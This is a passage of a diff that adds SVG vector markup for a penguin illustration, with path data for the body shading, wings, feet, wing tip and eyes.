+					d="m 134.28,113.99 c -4.16,2.9 -6.6,2.56 -11.64,3.12 -5.05,0.57 -18.7,0.36 -18.7,0.36 0,0 1.97,-0.03 6.36,0.78 4.38,0.82 13.31,1.6 18.34,3.51 5.04,1.92 6.87,2.47 9.93,4.4 4.35,2.75 7.55,7.06 11.71,10.08 0,0 0.2,-4 -1.48,-6.99 -1.68,-2.99 -6.2,-7.7 -7.53,-12.1 -1.32,-4.4 -1.96,-13.04 -1.96,-13.04 0,0 -0.88,6.99 -5.03,9.88 z"/>
+				<path id="belly_shadow_middle" opacity="0.2" fill="url(#fill_belly_shadow_middle)" filter="url(#blur_belly_shadow_middle)" clip-path="url(#clip_body)"
+					d="m 95.17,107.81 c -0.16,1.25 -0.36,2.5 -0.6,3.74 -0.12,0.61 -0.26,1.22 -0.48,1.8 -0.23,0.58 -0.56,1.14 -1.02,1.55 -0.41,0.37 -0.9,0.62 -1.4,0.85 -1.94,0.88 -4.01,1.47 -6.12,1.74 0.84,0.06 1.68,0.14 2.53,0.23 0.53,0.06 1.06,0.12 1.57,0.25 0.52,0.14 1.03,0.34 1.46,0.65 0.47,0.35 0.84,0.82 1.12,1.34 0.55,1.02 0.73,2.2 0.83,3.37 0.13,1.48 0.14,2.98 0.03,4.46 0.1,-0.99 0.31,-1.98 0.62,-2.92 0.57,-1.72 1.47,-3.32 2.69,-4.65 0.49,-0.52 1.02,-1.01 1.6,-1.42 1.79,-1.26 4.07,-1.81 6.24,-1.51 -2.21,0.09 -4.44,-0.6 -6.2,-1.93 -0.9,-0.68 -1.68,-1.52 -2.22,-2.5 -0.84,-1.52 -1.08,-3.37 -0.65,-5.05 z"/>
+				<path id="belly_shadow_lower" opacity="0.11" fill="#000000" filter="url(#blur_belly_shadow_lower)" clip-path="url(#clip_body)"
+					d="m 89.85,137.14 c -1.06,4.03 -1.79,8.15 -2.17,12.31 -0.55,5.87 -0.42,11.78 -0.74,17.67 -0.26,4.99 -0.85,10.04 0.02,14.97 0.41,2.35 1.15,4.64 2.2,6.78 0.16,-0.82 0.29,-1.64 0.36,-2.47 0.37,-4 -0.3,-8.01 -0.53,-12.01 -0.4,-7.02 0.57,-14.04 0.97,-21.06 0.3,-5.39 0.27,-10.8 -0.11,-16.19 z"/>
+			</g>
+			<g id="body_glare">
+				<path id="belly_glare" opacity="0.75" fill="#7c7c7c" filter="url(#blur_belly_glare)" clip-path="url(#clip_body)"
+					d="m 160.08,131.23 c 1.03,-0.16 7.34,5.21 6.48,7.21 -0.86,1.99 -2.49,0.79 -3.65,0.8 -1.16,0.02 -4.33,1.46 -4.86,0.55 -0.54,-0.91 1.4,-3.03 2.41,-4.81 0.82,-1.43 -1.4,-3.59 -0.38,-3.75 z"/>
+				<path id="head_glare" fill="#7c7c7c" filter="url(#blur_head_glare)" clip-path="url(#clip_body)"
+					d="m 121.52,11.12 c -2.21,1.56 -1.25,3.51 -0.3,5.46 0.95,1.96 -2.09,7.59 -2.12,7.83 -0.03,0.24 5.98,-2.85 7.62,-4.87 1.94,-2.37 6.83,3.22 6.56,2.37 0.01,-1.52 -9.55,-12.34 -11.76,-10.79 z"/>
+				<path id="neck_glare" fill="#838384" filter="url(#blur_neck_glare)" clip-path="url(#clip_body)"
+					d="m 138.27,76.63 c -1.86,1.7 0.88,4.25 2.17,7.24 0.81,1.86 3.04,4.49 5.2,4.07 1.63,-0.32 2.63,-2.66 2.48,-4.3 -0.3,-3.18 -2.98,-3.93 -4.93,-5.02 -1.54,-0.86 -3.61,-3.18 -4.92,-1.99 z"/>
+			</g>
+		</g>
+		<g id="wings">
+			<g id="wing_left">
+				<path id="wing_left_base" fill="#020204"
+					d="m 63.98,100.91 c -6.1,6.92 -12.37,13.63 -15.81,21.12 -1.71,3.8 -2.51,7.93 -3.68,11.93 -1.32,4.54 -3.12,8.94 -5.14,13.22 -1.87,3.95 -3.93,7.81 -5.98,11.66 -1.5,2.81 -3.02,5.67 -3.54,8.81 -0.41,2.48 -0.18,5.04 0.46,7.47 0.63,2.43 1.64,4.75 2.79,6.98 4.88,9.55 12.21,17.77 20.89,24.07 3.94,2.85 8.15,5.32 12.58,7.35 2.4,1.09 4.92,2.07 7.56,2.11 1.32,0.03 2.65,-0.19 3.86,-0.72 1.2,-0.53 2.28,-1.38 3,-2.49 0.88,-1.36 1.18,-3.05 1,-4.66 -0.18,-1.61 -0.81,-3.15 -1.65,-4.53 -2.06,-3.38 -5.31,-5.83 -8.44,-8.25 -6.76,-5.23 -13.29,-10.76 -19.55,-16.58 -1.76,-1.65 -3.53,-3.34 -4.76,-5.42 -1.2,-2.02 -1.85,-4.32 -2.29,-6.63 -1.21,-6.33 -0.9,-12.99 1.25,-19.07 0.85,-2.38 1.96,-4.65 3.04,-6.93 1.86,-3.95 3.62,-7.98 6.07,-11.6 3.05,-4.51 7.13,-8.33 9.61,-13.17 2.1,-4.09 2.95,-8.68 3.76,-13.2 0.64,-3.54 1.85,-7 2.47,-10.54 -1.21,2.3 -5.11,6.07 -7.5,9.07 z"/>
+				<path id="wing_left_glare" opacity="0.95" fill="#7c7c7c" filter="url(#blur_wing_left_glare)" clip-path="url(#clip_wing_left)"
+					d="m 56.96,126.1 c -2,1.84 -3.73,3.97 -5.13,6.31 -2.3,3.84 -3.65,8.16 -5.33,12.31 -1.24,3.09 -2.69,6.2 -2.86,9.53 -0.09,1.71 0.16,3.42 0.22,5.13 0.06,1.71 -0.1,3.49 -0.94,4.98 -0.7,1.25 -1.87,2.23 -3.22,2.71 1.83,0.61 3.45,1.79 4.6,3.33 0.96,1.3 1.58,2.81 2.41,4.18 0.68,1.12 1.51,2.16 2.54,2.97 1.02,0.82 2.25,1.4 3.54,1.56 1.79,0.23 3.65,-0.36 4.97,-1.58 -1.66,-15.55 -0.14,-31.42 4.44,-46.37 0.29,-0.94 0.59,-1.89 0.67,-2.87 0.07,-0.99 -0.12,-2.03 -0.72,-2.81 -0.31,-0.42 -0.74,-0.75 -1.23,-0.96 -0.48,-0.2 -1.02,-0.28 -1.54,-0.21 -0.52,0.06 -1.03,0.26 -1.45,0.57 -0.42,0.32 -0.76,0.74 -0.97,1.22 z"/>
+			</g>
+			<g id="wing_right">
+				<path id="wing_right_base" fill="#020204"
+					d="m 162.76,127.12 c 5.24,4.22 8.57,10.59 9.6,17.24 0.8,5.18 0.28,10.51 -0.89,15.62 -1.17,5.12 -2.97,10.06 -4.77,15 -0.71,1.96 -1.43,3.95 -1.71,6.02 -0.29,2.08 -0.11,4.27 0.89,6.11 1.15,2.11 3.29,3.56 5.59,4.24 2.27,0.68 4.72,0.66 7.02,0.09 2.3,-0.57 6.17,-1.31 8.04,-2.77 4.75,-3.69 5.88,-10.1 7.01,-15.72 1.17,-5.87 0.6,-12.02 -0.43,-17.95 -1.41,-8.09 -3.78,-15.99 -6.79,-23.62 -2.22,-5.62 -5.06,-10.98 -8.44,-15.96 -3.32,-4.89 -8.02,-8.7 -11.5,-13.48 -1.21,-1.66 -2.66,-3.38 -3.84,-5.06 -2.56,-3.62 -1.98,-2.94 -3.57,-5.29 -1.15,-1.7 -2.97,-2.28 -4.88,-3.02 -1.92,-0.74 -4.06,-0.96 -6.04,-0.41 -2.6,0.73 -4.73,2.79 -5.86,5.24 -1.13,2.46 -1.33,5.28 -0.89,7.95 0.57,3.44 2.14,6.64 3.92,9.64 2,3.39 4.32,6.66 7.35,9.18 3.16,2.63 6.98,4.37 10.19,6.95 z"/>
+				<path id="wing_right_glare" fill="#838384" filter="url(#blur_wing_right_glare)" clip-path="url(#clip_wing_right)"
+					d="m 150.42,118.99 c 0.42,0.4 0.86,0.81 1.31,1.19 3.22,2.63 4.93,5.58 8.2,8.16 5.34,4.22 10.75,11.5 11.8,18.15 0.82,5.19 -0.26,8.01 -1.58,14.12 -1.32,6.12 -5.06,14.78 -7.09,20.68 -0.8,2.35 1.64,1.38 1.32,3.86 -0.16,1.22 -0.18,2.45 -0.03,3.67 0.02,-0.23 0.03,-0.48 0.06,-0.71 0.39,-3.38 1.42,-6.63 2.55,-9.82 2.17,-6.13 4.66,-12.15 6.38,-18.45 1.72,-6.29 1.53,-10.82 0.63,-16.23 -1.13,-6.81 -5.09,-13.09 -10.69,-17.24 -3.97,-2.93 -8.64,-4.81 -12.86,-7.38 z"/>
+			</g>
+		</g>
+		<g id="feet">
+			<g id="foot_left">
+				<path id="foot_left_base" fill="url(#fill_foot_left_base)"
+					d="m 34.98,175.33 c 1.38,-0.57 2.93,-0.68 4.39,-0.41 1.47,0.27 2.86,0.91 4.09,1.74 2.47,1.68 4.3,4.12 6.05,6.54 4.03,5.54 7.9,11.2 11.42,17.08 2.85,4.78 5.46,9.71 8.76,14.18 2.15,2.93 4.57,5.64 6.73,8.55 2.16,2.92 4.07,6.08 5.03,9.58 1.25,4.55 0.76,9.56 -1.4,13.75 -1.52,2.95 -3.86,5.48 -6.7,7.19 -2.84,1.71 -5.83,2.47 -9.15,2.47 -5.27,0 -10.42,-2.83 -15.32,-4.78 -9.98,-3.98 -20.82,-5.22 -31.11,-8.32 -3.16,-0.95 -6.27,-2.08 -9.45,-2.95 -1.42,-0.39 -2.85,-0.73 -4.19,-1.34 -1.34,-0.6 -2.59,-1.51 -3.33,-2.77 -0.57,-0.98 -0.8,-2.13 -0.8,-3.26 0,-1.14 0.28,-2.26 0.67,-3.32 0.77,-2.13 2.02,-4.06 2.86,-6.17 1.37,-3.44 1.62,-7.23 1.43,-10.93 -0.18,-3.69 -0.78,-7.36 -1.03,-11.05 -0.12,-1.65 -0.16,-3.32 0.16,-4.95 0.31,-1.62 1.01,-3.21 2.2,-4.35 1.1,-1.06 2.55,-1.69 4.05,-2 1.49,-0.31 3.03,-0.32 4.55,-0.29 1.52,0.03 3.05,0.12 4.57,-0.01 1.52,-0.12 3.05,-0.46 4.37,-1.22 1.26,-0.72 2.29,-1.79 3.14,-2.96 0.85,-1.17 1.54,-2.45 2.25,-3.72 0.7,-1.26 1.43,-2.52 2.36,-3.64 0.92,-1.12 2.06,-2.09 3.4,-2.64 z"/>
+				<path id="foot_left_layer_1" fill="#d99a03" filter="url(#blur_foot_left_layer_1)" clip-path="url(#clip_foot_left)"
+					d="m 37.16,177.7 c 1.25,-0.5 2.67,-0.56 3.98,-0.26 1.32,0.3 2.55,0.94 3.61,1.77 2.14,1.65 3.62,3.97 5.05,6.26 3.42,5.54 6.76,11.15 9.92,16.86 2.4,4.31 4.68,8.7 7.62,12.65 1.95,2.62 4.18,5.03 6.17,7.62 1.99,2.59 3.76,5.41 4.64,8.56 1.14,4.05 0.68,8.54 -1.28,12.26 -1.42,2.68 -3.58,4.96 -6.2,6.48 -2.61,1.52 -5.67,2.28 -8.69,2.14 -4.82,-0.22 -9.23,-2.63 -13.77,-4.26 -8.71,-3.16 -18.14,-3.59 -27.08,-6.05 -3.2,-0.87 -6.32,-2.03 -9.53,-2.84 -1.43,-0.36 -2.88,-0.66 -4.23,-1.23 -1.35,-0.57 -2.62,-1.45 -3.36,-2.72 -0.54,-0.95 -0.76,-2.06 -0.73,-3.15 0.04,-1.09 0.31,-2.17 0.7,-3.19 0.78,-2.04 2,-3.88 2.78,-5.92 1.19,-3.08 1.34,-6.47 1.12,-9.76 -0.22,-3.29 -0.8,-6.56 -1,-9.85 -0.08,-1.48 -0.1,-2.97 0.2,-4.41 0.3,-1.45 0.93,-2.85 1.98,-3.89 1.14,-1.13 2.7,-1.74 4.29,-1.99 1.58,-0.24 3.19,-0.13 4.78,0.01 1.6,0.14 3.2,0.32 4.8,0.23 1.6,-0.1 3.22,-0.49 4.54,-1.39 1.2,-0.81 2.1,-2 2.79,-3.27 0.69,-1.27 1.18,-2.64 1.71,-3.98 0.52,-1.35 1.09,-2.69 1.91,-3.89 0.82,-1.19 1.93,-2.24 3.28,-2.79 z"/>
+				<path id="foot_left_layer_2" fill="#f5bd0c" filter="url(#blur_foot_left_layer_2)" clip-path="url(#clip_foot_left)"
+					d="m 35.99,174.57 c 1.22,-0.6 2.65,-0.72 3.98,-0.45 1.33,0.27 2.57,0.92 3.62,1.77 2.09,1.7 3.43,4.13 4.67,6.51 2.84,5.46 5.5,11.04 8.9,16.19 2.48,3.73 5.33,7.2 7.83,10.92 3.39,5.03 6.15,10.57 7.29,16.5 0.76,4 0.74,8.31 -1.18,11.9 -1.27,2.37 -3.32,4.31 -5.75,5.52 -2.42,1.22 -5.21,1.71 -7.92,1.47 -4.27,-0.37 -8.14,-2.47 -12.16,-3.94 -7.13,-2.59 -14.84,-3.22 -22.18,-5.18 -3.09,-0.82 -6.13,-1.89 -9.26,-2.54 -1.39,-0.29 -2.8,-0.5 -4.12,-1 -1.32,-0.5 -2.57,-1.33 -3.25,-2.55 -0.47,-0.86 -0.63,-1.86 -0.56,-2.84 0.07,-0.97 0.36,-1.92 0.74,-2.83 0.77,-1.8 1.9,-3.46 2.49,-5.32 0.88,-2.75 0.52,-5.72 -0.14,-8.53 -0.65,-2.8 -1.6,-5.55 -1.89,-8.41 -0.13,-1.27 -0.13,-2.57 0.17,-3.82 0.29,-1.25 0.88,-2.45 1.81,-3.34 1.2,-1.15 2.88,-1.73 4.56,-1.89 1.67,-0.16 3.35,0.06 5.01,0.3 1.66,0.24 3.34,0.5 5.01,0.42 1.68,-0.07 3.39,-0.51 4.7,-1.54 1.3,-1.02 2.12,-2.53 2.59,-4.09 0.47,-1.57 0.62,-3.2 0.81,-4.82 0.19,-1.62 0.43,-3.26 1.06,-4.77 0.63,-1.51 1.69,-2.9 3.17,-3.64 z"/>
+				<path id="foot_left_glare" fill="url(#fill_foot_left_glare)" filter="url(#blur_foot_left_glare)" clip-path="url(#clip_foot_left)"
+					d="m 51.2,188.21 c 2.25,4.06 3.62,8.72 5.85,12.82 2.05,3.77 4.38,7.65 6.46,11.12 0.93,1.55 3.09,3.93 5.27,7.62 1.98,3.34 3.98,8.01 5.1,9.58 -0.64,-1.84 -1.96,-6.77 -3.54,-10.28 -1.47,-3.28 -3.19,-5.15 -4.24,-6.92 -2.08,-3.47 -4.33,-6.6 -6.47,-9.91 -2.95,-4.57 -5.2,-9.68 -8.43,-14.03 z"/>
+			</g>
+			<g id="foot_right">
+				<path id="foot_right_shadow" opacity="0.2" fill="url(#fill_foot_right_shadow)" filter="url(#blur_foot_right_shadow)" clip-path="url(#clip_body)"
+					d="m 198.7,215.61 c -0.4,1.33 -1.02,2.62 -1.81,3.8 -1.75,2.59 -4.3,4.55 -6.84,6.35 -4.33,3.07 -8.85,5.89 -12.89,9.38 -2.7,2.34 -5.17,4.97 -7.45,7.73 -1.95,2.36 -3.79,4.84 -6.02,6.94 -2.25,2.12 -4.89,3.84 -7.74,4.77 -3.47,1.13 -7.13,1.08 -10.47,0.22 -2.34,-0.6 -4.63,-1.64 -6.08,-3.53 -1.45,-1.89 -1.92,-4.44 -2.09,-6.94 -0.3,-4.42 0.23,-8.93 0.71,-13.42 0.4,-3.73 0.77,-7.46 0.92,-11.18 0.27,-6.77 -0.18,-13.47 -1.09,-20.05 -0.16,-1.11 -0.32,-2.22 -0.23,-3.35 0.09,-1.14 0.47,-2.32 1.27,-3.2 0.74,-0.81 1.77,-1.29 2.79,-1.52 1.02,-0.24 2.06,-0.25 3.09,-0.28 2.43,-0.06 4.86,-0.21 7.25,0.01 1.51,0.13 2.99,0.41 4.49,0.55 2.51,0.24 5.12,0.12 7.64,-0.62 2.71,-0.8 5.29,-2.29 8.05,-2.7 1.13,-0.17 2.26,-0.15 3.36,0.01 1.12,0.15 2.24,0.46 3.1,1.15 0.66,0.52 1.14,1.23 1.51,1.99 0.56,1.14 0.9,2.39 1.1,3.68 0.17,1.14 0.24,2.31 0.53,3.41 0.48,1.81 1.58,3.35 2.89,4.6 1.32,1.25 2.85,2.24 4.39,3.22 1.53,0.97 3.07,1.93 4.7,2.73 0.77,0.38 1.56,0.72 2.29,1.15 0.74,0.44 1.42,0.97 1.91,1.67 0.66,0.95 0.92,2.2 0.72,3.43 z"/>
+				<path id="foot_right_base" fill="url(#fill_foot_right_base)"
+					d="m 213.47,222.92 c -2.26,2.68 -5.4,4.45 -8.53,6.05 -5.33,2.71 -10.86,5.1 -15.87,8.37 -3.36,2.19 -6.46,4.76 -9.36,7.53 -2.48,2.37 -4.83,4.9 -7.61,6.91 -2.81,2.03 -6.05,3.5 -9.48,4.01 -0.95,0.14 -1.9,0.21 -2.86,0.21 -3.24,0 -6.48,-0.78 -9.46,-2.08 -2.7,-1.17 -5.3,-2.86 -6.86,-5.36 -1.56,-2.52 -1.92,-5.59 -1.92,-8.56 -0.01,-5.23 0.96,-10.41 1.87,-15.57 0.76,-4.29 1.48,-8.58 1.95,-12.91 0.85,-7.86 0.84,-15.81 0.28,-23.71 -0.1,-1.32 -0.21,-2.65 -0.01,-3.96 0.2,-1.31 0.74,-2.62 1.74,-3.48 0.93,-0.8 2.17,-1.16 3.4,-1.22 1.22,-0.07 2.44,0.12 3.65,0.3 2.85,0.42 5.73,0.74 8.52,1.48 1.76,0.46 3.48,1.08 5.23,1.56 2.94,0.79 6.01,1.17 9.02,0.82 3.25,-0.38 6.41,-1.6 9.68,-1.52 1.34,0.03 2.67,0.28 3.95,0.69 1.3,0.41 2.59,1 3.55,1.98 0.73,0.74 1.24,1.67 1.62,2.64 0.57,1.44 0.88,2.98 1.01,4.52 0.11,1.37 0.09,2.76 0.35,4.11 0.43,2.21 1.6,4.24 3.04,5.97 1.45,1.74 3.18,3.21 4.91,4.66 1.73,1.45 3.46,2.89 5.32,4.16 0.87,0.6 1.77,1.16 2.6,1.81 0.83,0.66 1.59,1.42 2.11,2.34 0.45,0.81 0.69,1.72 0.69,2.65 0,0.52 -0.07,1.04 -0.23,1.56 -0.45,1.43 -1.28,2.82 -2.3,4.04 z"/>
+				<path id="foot_right_layer_1" fill="#cd8907" filter="url(#blur_foot_right_layer_1)" clip-path="url(#clip_foot_right)"
+					d="m 213.21,216.12 c -0.53,1.33 -1.28,2.58 -2.22,3.67 -2.07,2.42 -4.93,4.01 -7.78,5.44 -4.88,2.44 -9.92,4.58 -14.5,7.52 -3.06,1.97 -5.9,4.28 -8.55,6.78 -2.26,2.13 -4.41,4.41 -6.95,6.21 -2.57,1.83 -5.53,3.14 -8.65,3.6 -3.8,0.56 -7.72,-0.16 -11.25,-1.67 -2.46,-1.06 -4.84,-2.56 -6.27,-4.83 -1.42,-2.26 -1.75,-5.02 -1.75,-7.69 -0.02,-4.71 0.87,-9.37 1.71,-14 0.7,-3.85 1.36,-7.71 1.78,-11.6 0.76,-7.08 0.73,-14.22 0.25,-21.32 -0.08,-1.19 -0.17,-2.39 0.01,-3.57 0.18,-1.18 0.67,-2.35 1.57,-3.13 0.85,-0.73 1.99,-1.05 3.11,-1.1 1.11,-0.06 2.22,0.12 3.33,0.28 2.61,0.38 5.23,0.67 7.78,1.33 1.61,0.42 3.18,0.98 4.78,1.4 2.68,0.72 5.49,1.06 8.24,0.74 2.97,-0.34 5.85,-1.44 8.83,-1.37 1.23,0.03 2.44,0.26 3.61,0.62 1.19,0.37 2.37,0.9 3.25,1.78 0.66,0.67 1.11,1.51 1.48,2.38 0.53,1.29 0.89,2.67 0.91,4.07 0.03,1.46 -0.28,2.92 -0.09,4.37 0.16,1.17 0.66,2.28 1.3,3.28 0.63,1 1.4,1.91 2.17,2.81 1.48,1.75 2.96,3.53 4.82,4.87 2.11,1.53 4.62,2.43 6.8,3.85 0.65,0.43 1.28,0.91 1.74,1.54 0.78,1.06 0.98,2.5 0.54,3.74 z"/>
+				<path id="foot_right_layer_2" fill="#f5c021" filter="url(#blur_foot_right_layer_2)" clip-path="url(#clip_foot_right)"
+					d="m 212.91,214.61 c -0.6,1.35 -1.37,2.6 -2.28,3.71 -2.12,2.58 -4.99,4.35 -8,5.49 -4.97,1.88 -10.39,2.13 -15.26,4.27 -2.97,1.3 -5.65,3.26 -8.36,5.12 -2.18,1.49 -4.42,2.94 -6.82,3.98 -2.72,1.19 -5.6,1.85 -8.5,2.32 -1.84,0.29 -3.71,0.51 -5.57,0.41 -1.86,-0.1 -3.72,-0.54 -5.37,-1.49 -1.24,-0.72 -2.36,-1.75 -3.03,-3.1 -0.73,-1.49 -0.86,-3.24 -0.85,-4.94 0.05,-4.5 1.02,-8.96 0.99,-13.47 -0.03,-3.93 -0.81,-7.8 -1.03,-11.72 -0.43,-7.54 1.19,-15.2 -0.24,-22.59 -0.22,-1.19 -0.53,-2.37 -0.52,-3.58 0.01,-0.6 0.1,-1.21 0.31,-1.77 0.22,-0.55 0.56,-1.06 1.01,-1.42 0.39,-0.29 0.84,-0.47 1.31,-0.56 0.46,-0.08 0.94,-0.06 1.41,0.01 0.93,0.15 1.82,0.51 2.73,0.78 2.6,0.78 5.35,0.76 8,1.35 1.66,0.36 3.26,0.97 4.91,1.41 2.75,0.76 5.63,1.08 8.46,0.75 3.04,-0.36 6.01,-1.46 9.07,-1.38 1.26,0.03 2.5,0.26 3.71,0.62 1.21,0.36 2.42,0.87 3.34,1.8 0.65,0.67 1.13,1.52 1.51,2.4 0.57,1.29 0.96,2.69 0.95,4.11 -0.01,0.74 -0.12,1.47 -0.19,2.21 -0.06,0.74 -0.08,1.49 0.09,2.2 0.18,0.72 0.55,1.37 0.97,1.96 0.42,0.59 0.9,1.12 1.34,1.7 1.22,1.61 2.1,3.49 3.05,5.3 0.95,1.81 2.02,3.6 3.53,4.91 2.05,1.77 4.7,2.48 6.99,3.89 0.67,0.41 1.31,0.89 1.78,1.55 0.38,0.52 0.63,1.15 0.73,1.81 0.09,0.65 0.03,1.34 -0.17,1.96 z"/>
+				<path id="foot_right_glare" fill="url(#fill_foot_right_glare)" filter="url(#blur_foot_right_glare)" clip-path="url(#clip_foot_right)"
+					d="m 148.08,181.58 c 2.82,-0.76 5.22,1.38 7.27,2.99 1.32,1.13 3.24,0.85 4.86,0.9 2.69,-0.09 5.36,0.45 8.05,0.12 5.3,-0.45 10.49,-1.75 15.81,-1.97 2.54,-0.16 5.4,-0.31 7.59,1.17 0.89,0.62 2.2,3.23 3.07,2.25 -0.36,-2.74 -2.39,-5.39 -5.11,-6.12 -2.14,-0.34 -4.3,0.25 -6.46,0.06 -6.39,-0.15 -12.75,-1.34 -19.16,-1 -4.46,0.04 -8.91,-0.17 -13.37,-0.34 -1.75,-0.36 -2.37,1.19 -3.32,1.79 0.25,0.19 0.34,0.25 0.77,0.15 z"/>
+			</g>
+		</g>
+		<g id="wing_tip_right">
+			<g id="wing_tip_right_shadow">
+				<path id="wing_tip_right_shadow_lower" opacity="0.35" fill="url(#fill_wing_tip_right_shadow_lower)" filter="url(#blur_wing_tip_right_shadow_lower)" clip-path="url(#clip_foot_right)"
+					d="m 185.49,187.61 c -0.48,-0.95 -1.36,-1.66 -2.35,-2.07 -0.98,-0.41 -2.06,-0.55 -3.13,-0.54 -2.13,0.02 -4.25,0.57 -6.38,0.39 -1.79,-0.16 -3.49,-0.83 -5.24,-1.26 -1.81,-0.44 -3.73,-0.61 -5.52,-0.12 -1.92,0.52 -3.61,1.81 -4.67,3.49 -0.94,1.48 -1.38,3.23 -1.52,4.98 -0.14,1.75 0.01,3.5 0.19,5.25 0.12,1.26 0.27,2.52 0.57,3.75 0.31,1.23 0.78,2.43 1.52,3.46 1.07,1.48 2.66,2.54 4.37,3.17 2.8,1.03 5.98,0.98 8.73,-0.15 4.88,-2.12 9.01,-5.92 11.52,-10.6 0.91,-1.68 1.61,-3.47 2.06,-5.31 0.18,-0.74 0.32,-1.49 0.32,-2.25 0.01,-0.75 -0.12,-1.52 -0.47,-2.19 z"/>
+				<path id="wing_tip_right_shadow_upper" opacity="0.35" fill="url(#fill_wing_tip_right_shadow_upper)" filter="url(#blur_wing_tip_right_shadow_upper)" clip-path="url(#clip_foot_right)"
+					d="m 185.49,184.89 c -0.48,-0.69 -1.36,-1.2 -2.35,-1.5 -0.98,-0.3 -2.06,-0.39 -3.13,-0.39 -2.13,0.02 -4.25,0.42 -6.38,0.28 -1.79,-0.11 -3.49,-0.6 -5.24,-0.9 -1.81,-0.32 -3.73,-0.45 -5.52,-0.09 -1.92,0.37 -3.61,1.3 -4.67,2.52 -0.94,1.07 -1.38,2.34 -1.52,3.6 -0.14,1.26 0.01,2.53 0.19,3.79 0.12,0.91 0.27,1.83 0.57,2.72 0.31,0.89 0.78,1.76 1.52,2.5 1.07,1.07 2.66,1.83 4.37,2.29 2.8,0.75 5.98,0.71 8.73,-0.11 4.88,-1.53 9.01,-4.28 11.52,-7.66 0.91,-1.22 1.61,-2.51 2.06,-3.84 0.18,-0.54 0.32,-1.08 0.32,-1.62 0.01,-0.55 -0.12,-1.11 -0.47,-1.59 z"/>
+			</g>
+			<path id="wing_tip_right_base" fill="#020204"
+				d="m 189.55,178.72 c -0.35,-0.95 -0.97,-1.79 -1.72,-2.47 -0.75,-0.68 -1.64,-1.2 -2.57,-1.6 -1.86,-0.79 -3.89,-1.09 -5.89,-1.46 -1.87,-0.35 -3.74,-0.78 -5.62,-1.1 -1.96,-0.33 -3.98,-0.55 -5.92,-0.11 -1.69,0.38 -3.26,1.26 -4.54,2.43 -1.28,1.17 -2.28,2.63 -3,4.21 -1.27,2.79 -1.67,5.92 -1.43,8.97 0.18,2.27 0.76,4.61 2.25,6.32 1.21,1.39 2.92,2.26 4.68,2.78 3.04,0.9 6.35,0.85 9.36,-0.13 4.97,-1.67 9.37,-4.98 12.35,-9.29 0.98,-1.43 1.82,-2.98 2.2,-4.66 0.29,-1.28 0.3,-2.66 -0.15,-3.89 z"/>
+			<g id="wing_tip_right_glare">
+				<defs>
+					<path id="path_wing_tip_right_glare"
+						d="m 168.89,171.07 c -0.47,0.03 -0.93,0.08 -1.4,0.17 -2.99,0.53 -5.73,2.42 -7.27,5.03 -1.09,1.85 -1.58,4.03 -1.43,6.17 0.07,-1.5 0.46,-2.97 1.19,-4.28 1.23,-2.23 3.47,-3.91 5.98,-4.37 1.54,-0.28 3.13,-0.11 4.68,0.08 1.5,0.19 3,0.39 4.47,0.7 2.28,0.5 4.53,1.26 6.44,2.59 0.44,0.31 0.86,0.66 1.21,1.08 0.35,0.41 0.62,0.89 0.73,1.42 0.15,0.78 -0.07,1.6 -0.46,2.29 -0.39,0.7 -0.92,1.3 -1.48,1.86 -0.46,0.46 -0.94,0.89 -1.43,1.32 2.21,-0.43 4.44,-1.03 6.28,-2.31 0.77,-0.55 1.48,-1.2 1.94,-2.02 0.46,-0.83 0.65,-1.83 0.43,-2.75 -0.16,-0.62 -0.5,-1.19 -0.92,-1.67 -0.42,-0.48 -0.93,-0.87 -1.45,-1.24 -2.31,-1.62 -5.01,-2.65 -7.81,-2.99 -1.8,-0.33 -3.61,-0.61 -5.42,-0.83 -1.41,-0.18 -2.86,-0.33 -4.28,-0.25 z"/>
+				</defs>
+				<use id="wing_tip_right_glare_1" href="#path_wing_tip_right_glare" xlink:href="#path_wing_tip_right_glare"
+					fill="url(#fill_wing_tip_right_glare_1)" filter="url(#blur_wing_tip_right_glare)" clip-path="url(#clip_wing_tip_right)"/>
+				<use id="wing_tip_right_glare_2" href="#path_wing_tip_right_glare" xlink:href="#path_wing_tip_right_glare"
+					fill="url(#fill_wing_tip_right_glare_2)" filter="url(#blur_wing_tip_right_glare)" clip-path="url(#clip_wing_tip_right)"/>
+			</g>
+		</g>
+		<g id="face">
+			<g id="eyes">
+				<g id="eye_left">
+					<path id="eyeball_left" fill="url(#fill_eyeball_left)"
+						d="m 84.45,38.28 c -1.53,0.08 -3,0.79 -4.12,1.84 -1.13,1.05 -1.92,2.43 -2.41,3.88 -0.97,2.92 -0.75,6.08 -0.53,9.15 0.2,2.77 0.41,5.6 1.45,8.18 0.52,1.3 1.25,2.51 2.22,3.51 0.97,0.99 2.2,1.76 3.55,2.09 1.26,0.32 2.62,0.26 3.86,-0.13 1.25,-0.4 2.38,-1.11 3.32,-2.02 1.36,-1.33 2.27,-3.07 2.8,-4.9 0.53,-1.83 0.68,-3.75 0.65,-5.66 -0.04,-2.38 -0.35,-4.77 -1.09,-7.03 -0.75,-2.26 -1.94,-4.4 -3.6,-6.11 -0.8,-0.83 -1.72,-1.55 -2.75,-2.06 -1.04,-0.51 -2.2,-0.8 -3.35,-0.74 z"/>
+					<g id="pupil_left">
+						<path id="pupil_left_base" fill="#020204"
+							d="m 80.75,50.99 c -0.32,1.94 -0.33,3.97 0.33,5.81 0.44,1.22 1.17,2.33 2.05,3.28 0.57,0.62 1.23,1.18 1.99,1.55 0.77,0.37 1.65,0.52 2.48,0.32 0.76,-0.19 1.42,-0.68 1.91,-1.29 0.49,-0.61 0.82,-1.34 1.05,-2.09 0.69,-2.21 0.58,-4.62 -0.11,-6.83 -0.49,-1.61 -1.32,-3.16 -2.6,-4.24 -0.62,-0.52 -1.34,-0.93 -2.12,-1.11 -0.78,-0.19 -1.63,-0.14 -2.36,0.19 -0.81,0.37 -1.44,1.07 -1.85,1.86 -0.41,0.79 -0.62,1.67 -0.77,2.55 z"/>
+						<path id="pupil_left_glare" fill="url(#fill_pupil_left_glare)" filter="url(#blur_pupil_left_glare)" clip-path="url(#clip_pupil_left)"
+							d="m 84.84,49.59 c 0.21,0.55 0.91,0.75 1.3,1.19 0.37,0.42 0.76,0.87 0.97,1.4 0.39,1.01 -0.39,2.51 0.43,3.23 0.25,0.22 0.77,0.23 1.02,0 0.99,-0.9 0.77,-2.71 0.38,-3.99 -0.36,-1.15 -1.23,-2.25 -2.31,-2.8 -0.5,-0.26 -1.25,-0.47 -1.68,-0.11 -0.27,0.24 -0.24,0.74 -0.11,1.08 z"/>
+					</g>
+					<path id="eyelid_left" fill="url(#fill_eyelid_left)" clip-path="url(#clip_eye_left)"
